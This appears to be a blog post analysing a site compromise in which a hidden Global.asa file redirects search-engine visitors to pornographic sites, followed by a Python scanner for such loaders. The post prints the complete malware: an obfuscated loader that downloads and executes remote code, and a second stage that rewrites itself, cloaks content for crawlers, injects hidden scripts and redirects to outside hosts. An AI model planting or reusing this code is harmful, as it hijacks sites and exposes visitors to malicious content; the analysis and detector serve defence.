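This morning I helped a friend with a fairly tricky problem: the website opens normally when you type its domain name directly, but when it is opened from a search engine such as Baidu or Google, it redirects to pornographic sites.
From experience, I inferred that some ASP code was checking where the page request came from, i.e. HTTP_REFERER, and redirecting to the porn site whenever the traffic arrived from a search engine. This method is very stealthy: webmasters generally do not search for their own site, so they will not easily notice that it has been hijacked.
Because I built the site for my friend many years ago, I asked for the current code and read through it, but found no problem. I then began to wonder whether the server was infected with a virus or had some kind of IIS filter added, so I asked for Remote Desktop access and searched for a long time, finding nothing. I checked the IP address and saw it was an internal (private) address, meaning a gateway has to map and publish the site, so I suspected the gateway. After asking my friend, I learned that the gateway is a router; in addition, with IIS stopped the site could not be opened at all and no redirect occurred, which ruled out the possibility of the gateway injecting malicious code.
Was I stuck with nowhere left to go?
Then an idea struck: use FileMon to monitor the w3wp.exe process and see how the files read differ between opening the site through a search engine and opening it directly. After many comparisons I still found nothing suspicious.
Out of options, I went back to the site root directory and happened to turn on the display of hidden system files, and found an extra Global.asa file. Since I built the site myself and know it well, it could not possibly be using this file. I opened it, and every doubt was resolved.
The contents of the Global.asa file are as follows:
<script language="vbscript" runat="server">
'by_aming
'by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"g"&"l"&"o"&".1"&"0"&"0"&"5"&"0"&"0"&".c"&"o"&"m"&"/x"&"m"&"l"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"."&"a"&"s"&"a"&"q"&"u"&"a"&"n"&"."&"t"&"x"&"t"
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set obJStream = Server.CreateObject("Adodb.Stream")
obJStream.Type = 1
obJStream.Mode =3
obJStream.Open
obJStream.Write GetHtml
obJStream.Position = 0
obJStream.Type = 2
obJStream.Charset = "gb2312"
GetHtml = obJStream.ReadText
obJStream.Close
if instr(GetHtml,"by*aming")>0 then
execute GetHtml
end if
end sub
'sub Session_OnEnd
'end sub
</script>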
Global.asa is the site's startup file: when the site is accessed for the first time, the Application_OnStart section runs, and when a user visits for the first time, the Session_OnStart section runs. So what this code does is, whenever a visitor starts a session, download the content at http://glo.100500.com/XML/global.asaquan.txt and, if it contains the marker by*aming, execute it. Let's see what http://glo.100500.com/XML/global.asaquan.txt contains:
Code:
'<Html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHtml=Source;}</script></head><body onload=clear()>
'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>
'by*aming
Server.ScriptTimeout=600
Public Function createasa(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function createasax(ByVal Content)
On Error Resume Next
Set fso = Server.CreateObject("scripting.filesystemobject")
set f=fso.Getfile("//./" & Server.MapPath("/global.asax"))
f.Attributes=0
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")
Obj.Type = 2
Obj.open
Obj.Charset = "gb2312"
Obj.Position = Obj.Size
Obj.writetext = Content
Obj.SaveToFile "//./" & Server.MapPath("/global.asax"),2
Obj.Close
Set Obj = Nothing
f.Attributes=1+2+4
set f=Nothing
Set fso = Nothing
End Function
Public Function GetHtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set obJStream = Server.CreateObject("Adodb.Stream")
obJStream.Type = 1
obJStream.Mode =3
obJStream.Open
obJStream.Write GetHtml
obJStream.Position = 0
obJStream.Type = 2
obJStream.Charset = "gb2312"
GetHtml = obJStream.ReadText
obJStream.Close
End Function
Function check(user_agent)
allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")
check_agent=false
For agenti=lbound(allow_agent) to ubound(allow_agent)
If instr(user_agent,allow_agent(agenti))>0 then
check_agent=true
exit for
end if
Next
check=check_agent
End function
Function CheckRobot()
CheckRobot = False
Dim Botlist,i,Repls
Repls = request.ServerVariables("http_user_agent")
Krobotlist = "Baiduspider|Googlebot"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(Repls,Botlist(i)) > 0 Then
CheckRobot = True
Exit For
End If
Next
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1
If Session("ThisCheckRobot") = 1 Then CheckRobot = True
End Function
Function CheckRefresh()
CheckRefresh = False
Dim Botlist,i,Repls
Krobotlist = "baidu|google|sogou|soso|youdao"
Botlist = Split(Krobotlist,"|")
For i = 0 To Ubound(Botlist)
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then
CheckRefresh = True
Exit For
End If
Next
End Function
Sub sleep()
If response.IsClIEntConnected=true then
Response.Flush
else
response.end
end if
End Sub
If CheckRefresh=true Then
cnnbd=lcase(request.servervariables("HTTP_HOST"))
'response.redirect("http://www.220550.com/?"&cnnbd&"")
Response.Write("<div style=display:none><script src=http://count11.51yes.com/click.ASPx?id=114814173&logo=1></script><script src=http://JS.568tea.com/44.JS></script><script src=http://JS.37548.com/44.JS></script></div>")
response.end
end If
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
if check(user_agent)=true then
'body=GetHtml("http://Html.888hhh.com/2prn.ASP?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
body=GetHtml("http://i.bxhty.info/index.ASP?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")
response.write body
response.end
else
asa=GetHtml("http://glo.100500.com/XML/globalquan.txt")
if instr(asa,"by*aming")>0 then
createasa(asa)
end if
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")
namepath=Server.MapPath(ScriptAddress)
If Len(Request.QueryString) > 0 Then
ScriptAddress = ScriptAddress & "?" & Request.QueryString
end if
geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress
geturl =LCase(geturl)
'response.write replace(namepath,server.MapPath("/"),"")
'response.end
'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.ASP")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then
agent = lcase(request.servervariables("http_user_agent"))
referer = LCase(Request.ServerVariables("HTTP_REFERER"))
bot = ""
Amll = ""
if instr(agent, "+") > 0 then bot = agent
if instr(agent, "-") > 0 then bot = agent
if instr(agent, "http") > 0 then bot = agent
if instr(agent, "spider") > 0 then bot = agent
if instr(agent, "bot") > 0 then bot = agent
if instr(agent, "Linux") > 0 then bot = agent
if instr(agent, "baidu") > 0 then bot = agent
if instr(agent, "google") > 0 then bot = "nobot"
if instr(agent, "yahoo") > 0 then bot = "nobot"
if instr(agent, "msn") > 0 then bot = "nobot"
if instr(agent, "alexa") > 0 then bot = "nobot"
if instr(agent, "sogou") > 0 then bot = "nobot"
if instr(agent, "youdao") > 0 then bot = "nobot"
if instr(agent, "soso") > 0 then bot = "nobot"
if instr(agent, "iask") > 0 then bot = "nobot"
if bot="nobot" then
'Call WriteErr
'response.end
end if
If Instr(REFERER,"http") > 0 and Instr(REFERER,".") > 0 and Instr(REFERER,"/") > 0 and Instr(REFERER,"?") > 0 and Instr(REFERER,"=") > 0 Then Amll = "ok"
tjcount=request.CookIEs("cookIE_tjcount")
date1=request.CookIEs("cookIE_date")
date2=year(date)&month(date)&day(date)
if tjcount="" then
response.cookIEs("cookIE_tjcount")=0
response.cookIEs("cookIE_tjcount").Expires=DateAdd("d",1,now())
end if
if date1<>date2 then
response.cookIEs("cookIE_date")=date2
response.cookIEs("cookIE_date").Expires=DateAdd("d",365,now())
end if
tjcount=request.CookIEs("cookIE_tjcount")
date1=request.CookIEs("cookIE_date")
date2=year(date)&month(date)&day(date)
if date1=date2 and len(bot) = 0 then
if int(tjcount)<10 and len(Amll)>0 then
response.cookIEs("cookIE_tjcount")=int(tjcount)+1
response.cookIEs("cookIE_tjcount").Expires=DateAdd("d",1,now())
strHost=Request.ServerVariables("HTTP_HOST")
Response.Redirect("http://www.115225.com/?domain="&strHost&"")
else
'response.write "<h1>Service Unavailable</h1>"
response.write ""
'response.write getHtml(geturl&"?global=ok")
end if
response.end
end if
Call sleep()
end if
end if
'</body></Html>
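This code is made up of several functions:
createasa creates the global.asa file from the content passed in
createasax creates the Global.asax file from the content passed in
GetHtml fetches the content at the url passed in
check inspects the user-agent to decide whether the visitor is a search engine spider
CheckRobot checks whether the visitor is a robot?
CheckRefresh checks for a refresh (in the code, it tests whether the first 40 characters of HTTP_REFERER contain a search engine name)
In the end, what this code does is determine whether the page visit came from a search engine, and if so, write out this HTML:
<div style=display:none><script src=http://count11.51yes.com/click.ASPx?id=114814173&logo=1></script><script src=http://js.568tea.com/44.JS></script><script src=http://js.37548.com/44.JS></script></div>
At this point, the goal of hijacking traffic that comes from search engines has been achieved.
The fix is also simple: just delete this file. Of course, it is best to also check the website and find out why a Global.asa file was added in the first place.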
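A static check for the loader pattern shown above (remote fetch plus execute, with the URL split into concatenated string literals), as an added example that is not part of the original post. The function names, the sample text and the placeholder host example.invalid are constructed for illustration.

```python
import re
from pathlib import Path

# Runs of VBScript string literals joined with "&", e.g. "h"&"t"&"t"&"p"
CONCAT = re.compile(r'"[^"\r\n]*"(?:\s*&\s*"[^"\r\n]*")+')
FETCH = re.compile(r"xmlhttp", re.I)  # MSXML2.ServerXMLHTTP and relatives
EXEC = re.compile(r"^\s*execute(?:global)?\b", re.I | re.M)
URL = re.compile(r'''https?://[^\s"'<>]+''', re.I)

# Constructed sample with the same shape as the loader; the host is a placeholder.
SAMPLE = '''<script language="vbscript" runat="server">
sub Session_OnStart
url="h"&"t"&"t"&"p"&":"&"/"&"/"&"exam"&"ple.inv"&"alid/x.txt"
Set o=Server.CreateObject("MSXML2.serverXMLHTTP")
o.Open "GET",url,False
o.send
body=o.responseText
if instr(body,"marker")>0 then
execute body
end if
end sub
</script>'''

def fold_concat(source):
    """Collapse "a"&"b" runs into one literal so split-up URLs become visible."""
    def join(match):
        return '"' + "".join(re.findall(r'"([^"\r\n]*)"', match.group(0))) + '"'
    return CONCAT.sub(join, source)

def analyse(source):
    """Report loader traits in the text of one global.asa / global.asax."""
    folded = fold_concat(source)
    return {
        "remote_fetch": bool(FETCH.search(folded)),
        "dynamic_execute": bool(EXEC.search(folded)),
        "urls": sorted(set(URL.findall(folded))),
        "obfuscated": folded != source,
    }

def scan_webroot(root):
    """Check every global.asa/global.asax under root; hidden files are included."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.lower() in ("global.asa", "global.asax"):
            text = path.read_text(encoding="gb2312", errors="replace")
            result = analyse(text)
            if result["remote_fetch"] and result["dynamic_execute"]:
                hits[str(path)] = result
    return hits
```

Run `scan_webroot` against the IIS site root; a hit on a site that never shipped a Global.asa is the situation described in this post.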